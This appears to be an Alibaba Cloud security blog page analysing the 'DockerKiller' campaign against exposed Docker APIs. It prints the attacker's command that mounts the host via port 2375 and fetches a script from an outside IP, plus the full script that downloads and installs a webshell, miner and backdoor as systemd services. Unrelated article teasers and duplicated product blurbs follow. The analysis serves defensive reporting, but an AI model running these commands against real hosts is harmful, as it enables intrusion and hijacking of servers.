From the logs in p.txt, we can see that the author used Masscan to scan five network segment addresses starting with 172 on July 16, 2018. We suspect that this was a test run of the scanning script.
test.sh acted as the intrusion script. The script reads the list of Docker container IP addresses with an open port 2375 from dockerips.txt obtained with Masscan. Exploiting unauthorized Docker access vulnerability, the script then attempts to download 159.203.21.* and execute auto.sh on each of the found IP address, and upon successful execution, auto.sh is deleted.
The key shell command from the above, magnified:
docker -H tcp://$HOSTLINE:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "wget http://159.203.21.239/p/auto.sh" -O auto.sh;chmod 777 auto.sh;sleep 2s;sh auto.sh;sleep 5s;rm auto.shOnce Docker is compromised and auto.sh is executed, earlier versions of malicious files, if any, are removed, and then updated files are downloaded from the server to the compromised server, including the webshell, mining program, backdoor program, task files, and mining configuration files, and proceeds to their execution.
The sequence of the attack is as follows:
#! /bin/sh
rm bashd. 1;
rm xm. 1;
rm data.cfg. 1;
rm bashd.service. 1;
rm xm.service. 1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;The Alibaba Cloud Security team has recently discovered a novel attack on Docker services exposed on the web. While default malware functionality includes a rich DDoS and coin mining functionality, with a powerful webshell backdoor, the capabilities of this malware are unlimited. The cloud location of many Docker deployments makes it possible to execute extremely powerful in-cloud DDoS attacks and cloud-to-cloud DDoS attacks.
This article describes each step of DockerKiller kill chain, from scanning to intrusion to exploitation, providing you with an in-depth analysis of the discovered Docker vulnerability.
The Computer Emergency Response Team (CERT) initiated an advanced analysis process to follow up and analyze the DDoS attack in response of the attack took on Oct 21, 2016 to the DNS service provider Dyn. According to the CERT analysis, this incident involved multiple factors particularly IoT device security vulnerabilities. In addition to the DDoS attack and DNS security on the surface, there were still many other issues that are worth greater attention and further research.
In this article, you will get some information on the importance of IoT device security by looking at CERT's interpretation of the infamous 2016 DDoS attack.
Alibaba Cloud Anti-DDoS Pro is now integrated with Log Service to provide real-time analysis and reports of access and attack logs.
The APNIC DDoS threat landscape in 2017 states that more than 80% of DDoS attacks are combined with HTTP flood attacks, which can be difficult to detect. Hence, it is important to analyze access logs in real time to identify attack behaviors and apply a suitable protection policy in a timely manner.
After you set up Anti-DDoS Pro for your website, Log Service starts to collect access logs and attack logs in real time. You can query and analyze log data collected by Anti-DDoS Pro, and the results are displayed as easy-to-read dashboards.
Distributed Denial of Service (DDoS) exploits client/server technology to combine multiple computers and form a platform to initiate an attack against one or more targets, which poses a threat that is orders of magnitude greater than that of a denial of service attack.
Anti-DDoS Pro is a value-added service used to protect servers, including external servers hosted in Mainland China, against volumetric DDoS attacks. You can redirect attack traffic to Anti-DDoS Pro to ensure the stability and availability of origin sites.
Alibaba Cloud Anti-DDoS Premium is a value-added DDoS protection service. This service is used to protect servers against volumetric DDoS attacks and ensure the availability of business. By modifiying DNS records to redirect malicious traffic through Anti-DDoS Premium’s dedicated IP address, Anti-DDoS Premium, protects your online presence.
Alibaba Cloud Anti-DDoS Premium is a value-added DDoS protection service. This service is used to protect servers against volumetric DDoS attacks and ensure the availability of business. By modifiying DNS records to redirect malicious traffic through Anti-DDoS Premium’s dedicated IP address, Anti-DDoS Premium, protects your online presence.
2,605 posts | 747 followers
FollowAlibaba Cloud Security - August 29, 2018
Alibaba Clouder - June 11, 2019
Alibaba Cloud Security - February 26, 2019
Alibaba Cloud Security - May 28, 2019
Alibaba Clouder - June 13, 2019
Alibaba Clouder - June 19, 2019
2,605 posts | 747 followers
Follow
Managed Security Service
Identify vulnerabilities and improve security management of Alibaba Cloud WAF and Anti-DDoS and with a fully managed security service
Learn More
Anti-DDoS
A comprehensive DDoS protection for enterprise to intelligently defend sophisticated DDoS attacks, reduce business loss risks, and mitigate potential security threats.
Learn MoreMore Posts by Alibaba Clouder